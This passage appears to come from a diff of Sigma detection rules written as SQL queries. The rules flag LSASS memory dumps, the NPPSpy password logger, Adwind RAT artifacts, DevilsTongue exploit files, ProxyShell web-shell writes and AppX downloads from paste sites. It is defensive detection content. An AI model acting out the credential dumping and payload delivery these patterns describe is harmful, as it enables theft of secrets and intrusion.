'%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" ], - "filename": 
"win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "SCM Database Privileged Operation", - "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects non-system users performing privileged operation os the SCM database", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE 
'%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" ], - "filename": "win_security_scm_database_privileged_operation.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Failed Logon From Public IP", - "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "status": "test", - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "author": "NVISO", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ], - "falsepositives": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE 
'172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" ], - "filename": "win_security_susp_failed_logon_source.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Device Installation Blocked", - "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "title": "Creation of an Executable by an Executable", + "id": "297afac9-5d02-4138-8c58-b977bac60556", "status": "experimental", - "description": "Detects an installation of a device that is forbidden by the system policy", + "description": "Detects the creation of an executable by another executable", "author": "frack113", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" - ], - "filename": "win_security_device_installation_blocked.yml" - }, - { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - 
"falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" - ], - "filename": "win_security_susp_lsass_dump.yml" - }, - { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", - "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "Software installers", + "Update utilities", + "32bit applications launching their 64bit versions" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%.exe' ESCAPE '\\' AND TargetFilename LIKE '%.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\cleanmgr.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\dxgiadaptercache.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\Dism.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\') OR (Image LIKE 
'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%:\\\\WUDownloadCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WindowsUpdateBox.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\WindowsUpdateBox.Exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\Microsoft\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Squirrel.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\SquirrelTemp\\\\tempb\\\\' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\assembly\\\\NativeImages\\_%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.vscode\\\\extensions\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\SquirrelTemp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 
'C:\\\\WINDOWS\\\\TEMP\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_dropper.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", - "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "status": "test", + "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_terminalservices_rdp_ngrok.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "New Firewall Rule Added In Windows Firewall Exception List", - "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", + "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "status": "experimental", - "description": "Detects when a rule has been added to the Windows Firewall exception list", + "description": "Detects PowerShell creating a binary executable or script file.", "author": "frack113", - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2004' AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 
'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "tags": [ + "attack.persistence" ], - "filename": "win_firewall_as_add_rule.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" - ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "The Windows Defender Firewall Service Failed To Load Group Policy", - "id": "7ec15688-fd24-4177-ba43-1a950537ee39", - "status": "experimental", - "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", - "author": "frack113", - "level": "low", - "rule": [ - 
"SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2009')" - ], - "filename": "win_firewall_as_failed_load_gpo.yml" - }, - { - "title": "Firewall Rule Modified In The Windows Firewall Exception List", - "id": "5570c4d9-8fdd-4622-965b-403a5a101aa0", - "status": "experimental", - "description": "Detects when a rule has been modified in the windows firewall exception list", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2005' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" - ], - "filename": "win_firewall_as_change_rule.yml" - }, - { - "title": "Windows Defender Firewall Has Been Reset To Its Default Configuration", - "id": "04b60639-39c0-412a-9fbe-e82499c881a3", - "status": "experimental", - "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2032')" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
], - "filename": "win_firewall_as_reset_config.yml" - }, - { - "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", - "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", - "status": "experimental", - "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", - "author": "frack113", "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2006' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" - ], - "filename": "win_firewall_as_delete_rule.yml" - }, - { - "title": "Windows Firewall Settings Have Been Changed", - "id": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", - "status": "experimental", - "description": "Detects activity when the settings of the Windows firewall have been changed", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2002', '2003', '2008'))" - ], - "filename": "win_firewall_as_setting_change.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT 
(((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_powershell_drop_binary.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "status": "test", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a 
sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Deployment Of The AppX Package Was Blocked By The Policy", - "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "title": "Office Macro File Download", + "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", "status": "experimental", - "description": "Detects an appx package deployment that was 
blocked by the local computer policy", - "author": "frack113", + "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Legitimate macro files downloaded from the internet", + "Legitimate macro files sent as attachments via emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\safari.exe' ESCAPE '\\' OR Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' 
ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_policy_block.yml" + "filename": "file_event_win_office_macro_files_downloaded.yml" }, { - "title": "Suspicious AppX Package Installation Attempt", - "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", + "title": "Publisher Attachment File Dropped In Suspicious Location", + "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "status": "experimental", - "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Legitimate AppX packages not signed by MS used part of an enterprise" + "Legitimate usage of \".pub\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" ], - "filename": 